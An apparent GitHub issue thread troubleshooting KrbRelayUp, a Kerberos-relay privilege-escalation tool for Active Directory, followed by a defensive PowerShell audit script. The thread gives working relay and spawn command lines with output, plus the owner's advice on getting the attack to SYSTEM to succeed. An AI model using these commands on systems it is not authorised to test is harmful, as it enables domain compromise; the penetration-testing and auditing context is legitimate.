Could not find computer account SID: #3

Open
dreizehnutters opened this issue Apr 27, 2022 · 11 comments
@dreizehnutters

Hey,

I just tried the POC for a customer. Unfortunately the method does not seem to work on the Windows 10 Enterprise 19042 Client.
LDAP signing is disabled

KrbRelayUp_fail

@0xBrAinsTorM

Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)

@PyroChiliarch

I had this issue, started working after a reboot.

@qiminghe

qiminghe commented May 2, 2022

same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works:
KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[+] Computer account "evilhost$" added with password "pass0123"
[-] Could not find computer account SID:
[-] Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Help?

@Dec0ne
Owner

Dec0ne commented May 2, 2022

same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works: KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [+] Computer account "evilhost$" added with password "pass0123" [-] Could not find computer account SID: [-] Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [-] Could not add new computer account: [-] The user has insufficient access rights. Help?

In the first command your domain was incorrect, so it couldn't find the SID of the new computer in that domain (because it doesn't exist), so this is why it failed.
In the second command the domain flag was correct, but it couldn't add the "evilhost$" computer because it already exists (it was added in the first command).
Try either removing the -CreateNewComputerAccount from the second command or specifying a new -computerName:

  • KrbRelayUp.exe relay -d mycompany.com -ComputerName evilhost$ -ComputerPassword pass0123
  • KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost222$ -ComputerPassword pass0123

In the next version (should be out this week) the tool will look up the domain by itself, so this kind of confusion would be less likely to happen again.

@qiminghe

qiminghe commented May 2, 2022

Tried two revisions, getting the same error:
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Do I have to be Win local admin (run as admin) for the command? Tried that, does not help either
Any debug/log option I can turn on for troubleshooting? Regarding domain lookup, is it just:
PS>systeminfo | Select-String 'Domain'
which I used here.

@qiminghe

qiminghe commented May 4, 2022

I pulled out the latest and re-ran the executable and noticed the following option disappearing
-c (--CreateNewComputerAccount)
Assuming I am running the executable from existing laptop123 I own:
.\KrbRelayUp.exe relay -d mycompany.com -cn laptop123$ -cp pass0123
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp spawn -d mycompany.com -cn laptop123$ -cp pass0123
However, when running the last suggested command, I am getting following error:
KrbRelayUp - Relaying you to SYSTEM
[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Do I have to do anything about laptop's firewall? I can verify AD server port 389/88 are all open. Anything else I need to check?

@Dec0ne
Owner

Dec0ne commented May 4, 2022

[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED means that the password specified for the laptop123$ machine account is incorrect.

The -cn and -cp flags are for the separate machine account you own or the one you added if you specified -c to create a new one (not the one you are executing KrbRelayUp from).

Run those 2 commands and it should work:

  • .\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
  • .\KrbRelayUp.exe spawn -d mycompany.com -cn newcomputer$ -cp newpass0123

@qiminghe

qiminghe commented May 4, 2022

When running the following command to createnewcomputeraccount (-c)
.\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
I fall back to the old error below (still not sure what is causing the problem without debug/logs)
KrbRelayUp - Relaying you to SYSTEM
[-] Could not add new computer account:
[-] The user has insufficient access rights.

@Dec0ne
Owner

Dec0ne commented May 5, 2022

Insufficient privileges to add a computer account is usually due to either a restriction in the domain where regular users are not allowed to add a new machine account (this is actually one of the mitigation suggestions for this attack) or because your user has reached the maximum quota for new computer accounts it may add, which is 10 by default (this is my guess for your specific issue).
You can either delete via domain admin from the DC all of the computer accounts you've added, and that will reset your user's quota so you can perform the attack again, or use another domain user to perform the attack with.

@qiminghe

qiminghe commented May 5, 2022

I verified:

  1. AD ldap:// is bind-able to 389, assuming LDAP signing is NOT enforced (default).
  2. query for 'ms-DS-MachineAccountQuota' which is 10 (default) as follows:
    PS>Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
    DistinguishedName : DC=xxx,DC=xxx,DC=xxx,DC=xxx
    ms-DS-MachineAccountQuota : 10
    Name : corp
    ObjectClass : domainDNS
    ObjectGUID : xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

How do I query AD to see if I have reached my quota? I have seen the following error 10+ times though:
[+]Computer account "evilhost$" added with password xxxx
[-]Could not find computer account SID:
Does this mean 'evilhost' is successfully added? If so, how to AD-query for it?
The Windows machine running the script has Full DN as: CN=laptop123,OU=xxx,OU=xxx,DC=xxx,DC=xxx,DC=xxx,DC=xxx
Do I have to provide KrbRelayUp with full DN? like -cn CN=evilhost,OU=xxx,....? Please advise. Thx

@Dec0ne
Owner

Dec0ne commented May 6, 2022

Could you check the previous commands using a new low priv user? (which probably still hasn't reached its ms-DS-MachineAccountQuota limit)
Another route you could take is logging in to your DC using a domain admin and manually deleting all of the machine accounts added by the previous KrbRelayUp runs; this will let your user add new machine accounts again.
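
For defenders reading this thread, the quota and the leftover machine accounts discussed above can be audited from the directory. The following PowerShell is an added example, not part of the original comments or the KrbRelayUp project; it assumes the RSAT ActiveDirectory module and read access to the domain, and it reports the quota, the machine accounts created by ordinary users (via ms-DS-CreatorSID), and the computers that have RBCD configured.

```powershell
# Added example for auditing; not code from the KrbRelayUp project.
# Assumes the RSAT ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

$domain = Get-ADDomain

# 1. Domain-wide quota: machine accounts an ordinary user may create (default 10).
$quota = (Get-ADObject -Identity $domain.DistinguishedName `
            -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
"ms-DS-MachineAccountQuota = $quota"

# 2. Accounts created under the quota record their creator in ms-DS-CreatorSID.
#    Group them per creator to see who is at or near the limit.
$created = Get-ADComputer -LDAPFilter '(ms-DS-CreatorSID=*)' `
             -Properties 'ms-DS-CreatorSID', whenCreated

$created | Group-Object { $_.'ms-DS-CreatorSID'.Value } | ForEach-Object {
    $sid = $_.Name
    try {
        $who = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                 Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        $who = $sid   # creator was deleted or cannot be resolved
    }
    [pscustomobject]@{
        Creator   = $who
        Count     = $_.Count
        AtQuota   = ($_.Count -ge $quota)
        Computers = ($_.Group.Name -join ', ')
    }
} | Sort-Object Count -Descending | Format-Table -AutoSize -Wrap

# 3. Computers with resource-based constrained delegation set, and who may
#    delegate to them. Unexpected entries here deserve review.
Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties PrincipalsAllowedToDelegateToAccount |
    Select-Object Name,
        @{ n = 'AllowedToDelegate'
           e = { $_.PrincipalsAllowedToDelegateToAccount -join '; ' } } |
    Format-Table -AutoSize -Wrap

# 4. Mitigation mentioned in the thread: stop regular users from adding
#    machine accounts. Left commented out because it changes the domain.
# Set-ADDomain -Identity $domain -Replace @{ 'ms-DS-MachineAccountQuota' = 0 }
```

ms-DS-CreatorSID is only populated when the account was created by a user without administrative rights, so accounts joined by domain admins do not appear in the second report.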
